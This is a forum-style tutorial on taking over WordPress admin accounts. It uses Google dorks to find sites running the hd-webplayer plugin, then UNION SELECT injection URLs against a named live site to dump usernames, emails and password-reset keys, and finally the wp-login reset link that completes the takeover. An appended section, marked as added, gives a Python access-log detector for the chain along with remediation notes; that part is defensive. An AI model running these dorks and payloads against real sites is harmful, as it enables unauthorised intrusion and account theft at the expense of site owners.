- [Tutorial] Hack WordPress site with SQL injection [Tuto]
- Let's begin.
- First of all we need to find a vulnerable page.
- We enter this in Google:
- Code:
- # Dork 1 (config.php)
- inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
- # Dork 2 (playlist.php)
- inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
- # Dork 3 (General):
- inurl:"/wp-content/plugins/hd-webplayer/"
- Once you have found a site, you need to find the admin's username and email.
- I will be using this site as an example:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
- [Image: regiont.png]
- When I add ' the text disappears, so it is vulnerable.
- [Image: regionzn.png]
- NOTE: I will not demonstrate how to SQL inject.
- Now we need admin username and email.
- We need to inject:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- Now we have 2 users.
- [Image: regionjhg.png]
- We pick one and copy his email.
- Go to the login page of the site.
- It is usually here:
- Code:
- http://www.site.com/wp-login.php
- And press "Lost your password?"
- [Image: regionz.png]
- Now you enter either the username or the email.
- Either one works, so it doesn't matter which.
- I entered the email.
- [Image: regionby.png]
- [Image: regionng.png]
- When you get:
- "Check your e-mail for the confirmation link."
- it means the reset key has been generated and sent.
- Now we need to get the activation key.
- Go back to the syntax you used for extracting email and username and do this:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- [Image: regiongn.png]
- Voila!
- Now we just need to reset it.
- Go to:
- Code:
- wp-login.php?action=rp&key=resetkey&login=username
- NOTE: Replace the key= and login= values with the ones you extracted.
- So my link will be:
- [Image: regionzi.png]
- Enter new password:
- [Image: thefreenudecelebritysit.png]
- [Image: regiongv.png]
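As an added, defensive example that is not part of the original tutorial: every step above leaves a recognisable trail in the web server's access log, namely a non-numeric videoid on the hd-webplayer playlist.php page, a UNION SELECT that reads wp_users, a lost-password request, and finally a wp-login.php?action=rp request from the same client. The Python below parses constructed common-log-format lines (not real traffic; the IPs and the EXAMPLEKEY value are placeholders), tags each of those steps, and correlates a dump of user_activation_key with a later reset-link visit from the same address.

```python
"""
Detect the hd-webplayer SQL injection / reset-key chain in access logs.
Added example; the log lines below are constructed, not real traffic.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache common-log-format samples. 198.51.100.7 walks the
# whole chain from the tutorial; 203.0.113.9 is an ordinary visitor.
SAMPLE_LOG = """
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3' HTTP/1.1" 200 17
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1" 200 733
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
198.51.100.7 - - [10/Oct/2023:13:57:40 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+UNION+SELECT+1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11+FROM+wp_users-- HTTP/1.1" 200 801
198.51.100.7 - - [10/Oct/2023:13:58:05 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY&login=admin HTTP/1.1" 200 2210
203.0.113.9 - - [10/Oct/2023:14:01:00 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=12 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PATH = "/wp-content/plugins/hd-webplayer/"
# Signatures of the UNION-based extraction used against wp_users.
SQLI_RE = re.compile(r"union\s+select|group_concat\s*\(|\bfrom\s+wp_users\b", re.I)
# Columns whose disclosure enables account takeover.
SENSITIVE_COLUMNS = ("user_activation_key", "user_pass")


def parse_line(line):
    """Split one CLF line into ip, timestamp, path, decoded query and params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "path": parts.path,
        # Decode %20 and '+' so signatures match however the client encoded them.
        "query": unquote_plus(parts.query),
        "params": parse_qs(parts.query),
    }


def classify(entry):
    """Return the list of suspicious behaviours seen in one request."""
    tags = []
    if entry["path"].startswith(PLUGIN_PATH):
        videoid = entry["params"].get("videoid", [""])[0]
        # The page expects a numeric id; a quote or SQL keywords are a probe.
        if videoid and not re.fullmatch(r"\d+", videoid):
            tags.append("non_numeric_videoid")
        if SQLI_RE.search(entry["query"]):
            tags.append("union_injection")
        if any(col in entry["query"] for col in SENSITIVE_COLUMNS):
            tags.append("credential_column_read")
    if entry["path"].endswith("/wp-login.php"):
        action = entry["params"].get("action", [""])[0]
        if action == "lostpassword":
            tags.append("password_reset_request")
        elif action == "rp":
            tags.append("reset_link_used")
    return tags


def analyze(log_text):
    """Tag each request and correlate key dumps with reset-link use per client."""
    events = []
    tags_by_ip = defaultdict(set)
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            events.append({"ip": entry["ip"], "ts": entry["ts"],
                           "path": entry["path"], "tags": tags})
            tags_by_ip[entry["ip"]].update(tags)
    # A client that read user_activation_key and then opened a reset link
    # has most likely completed the takeover chain described in the tutorial.
    chains = sorted(ip for ip, t in tags_by_ip.items()
                    if "credential_column_read" in t and "reset_link_used" in t)
    return {"events": events, "takeover_chains": chains}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ev in result["events"]:
        print(ev["ip"], ev["ts"], ev["path"], ",".join(ev["tags"]))
    print("takeover chains:", result["takeover_chains"])
```

On the fix side, the root cause is the plugin interpolating the videoid parameter straight into SQL; a WordPress plugin should pass it through `$wpdb->prepare()` with a `%d` placeholder, and an unmaintained plugin with a known injection should simply be removed. Current WordPress releases also no longer store the raw reset key: user_activation_key holds a timestamp and a password-style hash of the key, so reading the column does not by itself yield a usable reset link.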
- Thanks for reading!